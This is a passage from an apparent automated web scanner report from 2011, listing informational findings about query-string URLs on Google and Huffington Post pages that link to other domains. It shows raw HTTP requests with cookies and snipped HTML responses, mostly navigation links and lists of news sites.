Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 302 Found
Location: http://controlshift.aol.com/careers
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2011 02:51:48 GMT
Server: gws
Content-Length: 232
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://controlshift.aol.com/careers">here</A>
...[SNIP]...

16.84. http://www.google.com/webhp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /webhp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/webhp?sourceid=chrome-instant&ie=UTF-8&ion=1&nord=1
The response contains the following link to another domain:
  • http://www.youtube.com/?ie=UTF-8&hl=en&tab=w1

Request

GET /webhp?sourceid=chrome-instant&ie=UTF-8&ion=1&nord=1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:01:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 39643

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"5ATCTbjcDcjUgAfTnpDMDg",kEXPI:"17259,24472,27147,28505,28
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/?ie=UTF-8&hl=en&tab=w1">YouTube</a>
...[SNIP]...

16.85. http://www.huffingtonpost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
The response contains the following links to other domains:

Request

GET /?icid=navbar_huffpo_main5 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:45:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />


       <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&amp;v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&amp;v46755" type="text/css" media="screen" />                
       
<link rel="alternate" type="application/rss+xml" title="The Full Feed" href="http://feeds.huffingtonpost.com/huffingtonpost/raw_feed" />
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47014"></script>

<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<h1>Using a mobile device? Go to <a href="http://m.huffpost.com">m.huffpost.com</a>
...[SNIP]...
<div class="huffpo_logo_lightbox">
                           <img src="http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png" width="368" height="36" alt="" />
                       </div>
...[SNIP]...
<div id="huffpo_snn_is_loading" style="width:100%; text-align:center;"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div id="qr_tab_read_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<div id="qr_tab_news_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<!--
   
                   
-->
                       <img src="http://s.huffpost.com/images/v/logos/aol_cobrand/homepage.png" width="760" height="67" alt="homepage" />
           <!--
       
-->
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.popeater.com">POPEATER</a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html" id="entry_id_0" >
                           
                                                                                   <img id="headline_image" class="quickread_link" width="900" height="350" src="http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg" />
                                                                                                   </a>
...[SNIP]...
<a href="#" onclick="javascript:window.external.AddToFavoritesBar('http://www.huffingtonpost.com/webslices/?v=home#home_slice', 'Home', 'slice');">
       <img src="http://s.huffpost.com/images/webslice12x12.png" width="12" height="12" alt="IE8 Web Slice" />
   </a>
...[SNIP]...
<div class="float_left" style="width:45px; height:31px; margin:0 5px;"><img src="http://s.huffpost.com/images/v/blog_column.png" width="44" height="31" /></div>
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<span class="afb-icon">
       <img class="apps-feeds_image" alt="Facebook" src="http://s.huffpost.com/images/blank.gif"/>
    </span>
...[SNIP]...
<span class="afb-icon">
                   <img class="apps-feeds_image" alt="Twitter" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<span class="afb-icon" >
       <img class="apps-feeds_image" alt="Apple" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Android');" href="/p/huffingtonpost-android-ap.html" target="_blank">
       <img class="apps-feeds_image" alt="Android" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<li id="af-blackberry" class="apps-feeds_button">
    <a class="afb-icon" onclick="HPTrack.Module('follow').click('Blackberry');" href="http://appworld.blackberry.com/webstore/content/19143" target="_blank">
       <img class="apps-feeds_image" alt="Blackberry" src="http://s.huffpost.com/images/blank.gif"/>
       </a>
...[SNIP]...
<a class="afb-icon" href="/subscription/" onclick="HPTrack.Module('follow').click('Email'); QuickSubscribeUser.pop2(); return false;" target="_blank">
                   <img class="apps-feeds_image" alt="Email" src="http://s.huffpost.com/images/blank.gif"/>
               </a>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Rss');" href="/syndication/" target="_blank">
       <img class="apps-feeds_image" alt="Rss" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<a href="#" id="facebook_promo_link"><img src="http://s.huffpost.com/images/facebook_promo_connect.png?3" class="facebook_promo_connect" width="230" height="44" /></a>
...[SNIP]...
<div class="snn_twitter_loading_img"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/royalwedding.aol.com/media/2011/05/pippa10facts_74x58.jpg" alt="" class="img_border unloaded-image" />
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/">AOL Royal Wedding: 10 Things You Should Know About Pippa Middleton</a>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/realestate.aol.com/blog/media/2011/05/3843-22nd-st-pool-1304375357_74x58.jpg" alt="" class="img_border unloaded-image" /
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/">AOL Real Estate: Real Estate Tough Sell: The Too-Custom Home</a>
...[SNIP]...
<a href="#" onclick="SayIt.pop_email_form(); return false;">
           <img src="http://s.huffpost.com/images/v/something_to_say_button.png" width="300" height="58" alt="If you have something to say... Say it on the Huffington Post" />
       </a>
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/pandora-comedy-clips_n_857428.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<li><a href="http://abcnews.go.com/" target="_blank">ABC</a></li>
<li><a href="http://www.accesshollywood.com" target="_blank">Access Hollywood</a>
...[SNIP]...
<li><a href="http://english.aljazeera.net/" target="_blank">Al Jazeera</a>
...[SNIP]...
<li><a href="http://news.aol.com/" target="_blank">AOL News</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/" target="_blank">The Atlantic</a>
...[SNIP]...
<li><a href="http://news.bbc.co.uk/" target="_blank">BBC</a></li>
<li><a href="http://www.bloomberg.com/" target="_blank">Bloomberg</a></li>
<li><a href="http://www.boston.com/news/globe/" target="_blank">Boston Globe</a>
...[SNIP]...
<li><a href="http://www.c-span.org" target="_blank">C-SPAN</a></li>
<li><a href="http://www.cbsnews.com/" target="_blank">CBS</a></li>
<li><a href="http://www.suntimes.com/" target="_blank">Chicago Sun-Times</a>
...[SNIP]...
<li><a href="http://www.chicagotribune.com/" target="_blank">Chicago Tribune</a>
...[SNIP]...
<li><a href="http://www.csmonitor.com/" target="_blank">Christian Science Monitor</a>
...[SNIP]...
<li><a href="http://www.publicintegrity.org/" target="_blank">Center for Public Integrity</a>
...[SNIP]...
<li><a href="http://www.cnn.com/" target="_blank">CNN</a></li>
<li><a href="http://www.cq.com" target="_blank">Congressional Quarterly</a>
...[SNIP]...
<li><a href="http://www.telegraph.co.uk/" target="_blank">Daily Telegraph</a>
...[SNIP]...
<li><a href="http://www.democracynow.org/" target="_blank">Democracy Now!</a>
...[SNIP]...
<li><a href="http://drudgereport.com/" target="_blank">Drudge Report</a>
...[SNIP]...
<li><a href="http://www.eonline.com/" target="_blank">E! Online</a></li>
<li><a href="http://www.ew.com/" target="_blank">Entertainment Weekly</a>
...[SNIP]...
<li><a href="http://www.forbes.com/" target="_blank">Forbes</a></li>
<li><a href="http://money.cnn.com/magazines/fortune/" target="_blank">Fortune</a>
...[SNIP]...
<li><a href="http://www.foxnews.com/" target="_blank">Fox News</a></li>
<li><a href="http://news.ft.com/home/us" target="_blank">Financial Times</a>
...[SNIP]...
<li><a href="http://www.theglobeandmail.com/" target="_blank">Globe and Mail</a>
...[SNIP]...
<li><a href="http://www.GlobalPost.com" target="_blank">GlobalPost.com</a>
...[SNIP]...
<li><a href="http://www.globalvoicesonline.org/" target="_blank">GlobalVoices</a>
...[SNIP]...
<li><a href="http://news.google.com/" target="_blank">Google News</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/" target="_blank">Guardian</a></li>
<li><a href="http://thehill.com/" target="_blank">The Hill</a></li>
<li><a href="http://news.independent.co.uk/" target="_blank">Independent</a>
...[SNIP]...
<li><a href="http://www.latimes.com/" target="_blank">Los Angeles Times</a>
...[SNIP]...
<li><a href="http://www.mcclatchydc.com/" target="_blank">McClatchy</a></li>
<li><a href="http://www.mediaite.com/" target="_blank">Mediaite</a></li>
<li><a href="http://www.linktv.org/mosaic/" target="_blank">Mosaic</a></li>
<li><a href="http://www.motherjones.com/" target="_blank">Mother Jones</a>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/" target="_blank">MSNBC</a></li>
<li><a href="http://nydailynews.com/" target="_blank">New York Daily News</a>
...[SNIP]...
<li><a href="http://www.observer.com/" target="_blank">New York Observer</a>
...[SNIP]...
<li><a href="http://www.nytimes.com/" target="_blank">New York Times</a>
...[SNIP]...
<li><a href="http://www.npr.org/" target="_blank">NPR</a></li>
<li><a href="http://www.pbs.org/newshour/" target="_blank">PBS NewsHour</a>
...[SNIP]...
<li><a href="http://www.newsweek.com" target="_blank">Newsweek</a></li>
<li><a href="http://www.people.com/people" target="_blank">People</a></li>
<li><a href="http://www.politico.com/" target="_blank">Politico</a></li>
<li><a href="http://www.propublica.org/"target="_blank">ProPublica</a>
...[SNIP]...
<li><a href="http://www.reuters.com/" target="_blank">Reuters</a>
...[SNIP]...
<li><a href="http://www.rollcall.com/" target="_blank">Roll Call</a></li>
<li><a href="http://rollingstone.com" target="_blank">Rolling Stone</a>
...[SNIP]...
<li><a href="http://www.theroot.com" target="_blank">The Root</a></li>
<li><a href="http://www.salon.com/" target="_blank">Salon</a></li>
<li><a href="http://www.sfgate.com/" target="_blank">San Francisco Chronicle</a>
...[SNIP]...
<li><a href="http://www.slate.com/" target="_blank">Slate</a></li>
<li><a href="http://reporting.sunlightfoundation.com/blog/" target="_blank">Sunlight Foundation</a>
...[SNIP]...
<li><a href="http://www.time.com/time/?xid=huffpo-direct" target="_blank">TIME</a></li>
<li><a href="http://www.timesonline.co.uk/section/0,,3,00.html" target="_blank">Times Of London</a>
...[SNIP]...
<li><a href="http://www.tmz.com" target="_blank">TMZ</a></li>
<li><a href="http://www.usatoday.com/" target="_blank">USA Today</a></li>
<li><a href="http://www.vanityfair.com/" target="_blank">Vanity Fair</a>
...[SNIP]...
<li><a href="http://wsj.com/" target="_blank">Wall Street Journal</a>
...[SNIP]...
<li><a href="http://www.washingtonindependent.com/" target="_blank">Washington Independent</a>
...[SNIP]...
<li><a href="http://www.washingtontimes.com/" target="_blank">Washington Times</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/" target="_blank">Washington Post</a>
...[SNIP]...
<li><a href="http://news.yahoo.com/" target="_blank">Yahoo! News</a>
...[SNIP]...
<li><a href=http://www.youthradio.org/>Youth Radio</a>
...[SNIP]...
<li><a href="http://americablog.blogspot.com/" target="_blank">Americablog</a>
...[SNIP]...
<li><a href="http://andrewsullivan.theatlantic.com/" target="_blank">Andrew Sullivan</a>
...[SNIP]...
<li><a href="http://www.bagnewsnotes.com/" target="_blank">BagNewsNotes</a>
...[SNIP]...
<li><a href="http://bloggingheads.tv/" target="_blank">Bloggingheads</a>
...[SNIP]...
<li><a href="http://boingboing.net/" target="_blank">Boing Boing</a>
...[SNIP]...
<li><a href="http://bravenewfilms.org/" target="_blank">Brave New Films</a>
...[SNIP]...
<li><a href="http://www.buzzfeed.com/" target="_blank">BuzzFeed</a></li>
<li><a href="http://www.buzzmachine.com/" target="_blank">BuzzMachine</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/thecorner/corner.asp" target="_blank">The Corner (National Review)</a>
...[SNIP]...
<li><a href="http://mediamatters.org/blog/" target="_blank">County Fair (Media Matters)</a>
...[SNIP]...
<li><a href="http://www.crooksandliars.com/" target="_blank">Crooks and Liars</a>
...[SNIP]...
<li><a href="http://dailycaller.com/" target="_blank">Daily Caller</a>
...[SNIP]...
<li><a href="http://dailykos.com/" target="_blank">Daily Kos</a></li>
<li><a href="http://www.slate.com/blogs/blogs/weigel/" target="_blank">David Weigel</a>
...[SNIP]...
<li><a href="http://democracyarsenal.org/" target="_blank">Democracy Arsenal</a>
...[SNIP]...
<li><a href="http://blogs.reuters.com/felix-salmon/" target="_blank">Felix Salmon</a>
...[SNIP]...
<li><a href="http://firedoglake.com/" target="_blank">Firedoglake</a>
...[SNIP]...
<li><a href="http://fivethirtyeight.blogs.nytimes.com/" target="_blank">FiveThirtyEight</a>
...[SNIP]...
<li><a href="http://www.FrumForum.com" target="_blank">FrumForum</a></li>
<li><a href="http://www.funnyordie.com/" target="_blank">Funny or Die</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/george/" target="_blank">George's Bottom Line (George Stephanopoulos)</a>
...[SNIP]...
<li><a href="http://www.gothamist.com" target="_blank">Gothamist</a></li>
<li><a href="http://hotlineblog.nationaljournal.com/" target="_blank">Hotline On Call (National Journal)</a>
...[SNIP]...
<li><a href="http://digbysblog.blogspot.com/">Hullabaloo</a>
...[SNIP]...
<li><a href="http://www.juancole.com/" target="_blank">Informed Comment</a>
...[SNIP]...
<li><a href="http://www.instapundit.com/" target="_blank">Instapundit</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/james-fallows/" target="_blank">James Fallows</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott" target="_blank">James Wolcott (Vanity Fair)</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/joshua-green/" target="_blank">Joshua Green</a>
...[SNIP]...
<li><a href="http://www.newsweek.com/blogs/kausfiles.html" target="_blank">Kausfiles (Newsweek)</a>
...[SNIP]...
<li><a href="http://www.kottke.org/" target="_blank">kottke.org</a>
...[SNIP]...
<li><a href="http://www.kcrw.com/news/programs/lr" target="_blank">Left, Right and Center</a>
...[SNIP]...
<li><a href="http://themoderatevoice.com/" target="_blank">The Moderate Voice</a>
...[SNIP]...
<li><a href="http://www.ndnblog.com" target="_blank">NDN Blog</a></li>
<li><a href="http://www.thenation.com/blogs/notion" target="_blank">The Notion (Nation)</a>
...[SNIP]...
<li><a href="http://www.pandagon.net/" target="_blank">Pandagon</a></li>
<li><a href="http://krugman.blogs.nytimes.com/" target="_blank">Paul Krugman</a>
...[SNIP]...
<li><a href="http://www.washingtonmonthly.com/" target="_blank">Political Animal (Washington Monthly)</a>
...[SNIP]...
<li><a href="http://politicalwire.com/" target="_blank">Political Wire</a>
...[SNIP]...
<li><a href="http://www.rawstory.com" target="_blank">Raw Story</a></li>
<li><a href="http://redstate.com/" target="_blank">Redstate.com</a>
...[SNIP]...
<li><a href="http://www.seeingtheforest.com/" target="_blank">Seeing The Forest</a>
...[SNIP]...
<li><a href="http://time-blog.com/swampland/" target="_blank">Swampland (Time)</a>
...[SNIP]...
<li><a href="http://talkleft.com/" target="_blank">TalkLeft</a></li>
<li><a href="http://www.talkingpointsmemo.com/" target="_blank">Talking Points Memo</a>
...[SNIP]...
<li><a href="http://www.prospect.org/weblog/" target="_blank">Tapped (American Prospect)</a>
...[SNIP]...
<li><a href="http://www.taylormarsh.com/" target="_blank">Taylor Marsh</a>
...[SNIP]...
<li><a href="http://www.thatminoritything.com/" target="_blank">That Minority Thing</a>
...[SNIP]...
<li><a href="http://www.truthdig.com/" target="_blank">Truthdig</a></li>
<li><a href="http://www.thinkprogress.org/" target="_blank">Think Progress</a>
...[SNIP]...
<li><a href="http://www.thismodernworld.com/" target="_blank">This Modern World</a>
...[SNIP]...
<li><a href="http://www.usnews.com/usnews/politics/whispers/whisphome.htm" target="_blank">Washington Whispers (US News & World Report)</a>
...[SNIP]...
<li><a href="http://www.wonkette.com/" target="_blank">Wonkette</a></li>
<li><a href="http://www.theyoungturks.com/" target="_blank">The Young Turks</a>
...[SNIP]...
<li><a href="http://www.thenation.com/authors/eric-alterman" target="_blank">Eric Alterman</a>
...[SNIP]...
<li><a href="http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html" target="_blank">David Brooks</a>
...[SNIP]...
<li><a href="http://www.nationaljournal.com/columns/political-connections">Ron Brownstein</a>
...[SNIP]...
<li><a href="http://www.observer.com/opinions_conason.asp" target="_blank">Joe Conason</a>
...[SNIP]...
<li><a href="http://www.davidcorn.com" target="_blank">David Corn</a>
...[SNIP]...
